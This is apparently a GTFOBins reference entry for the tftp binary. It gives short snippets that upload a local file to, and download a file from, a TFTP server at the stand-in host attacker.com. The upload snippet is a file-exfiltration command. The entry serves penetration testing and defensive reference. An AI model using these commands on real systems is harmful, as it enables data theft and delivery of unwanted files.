GTFOBins.github.io/_gtfobins/tftp.md
2018-05-24 21:05:11 +01:00

15 lines
323 B
Markdown

---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
get file_to_get
---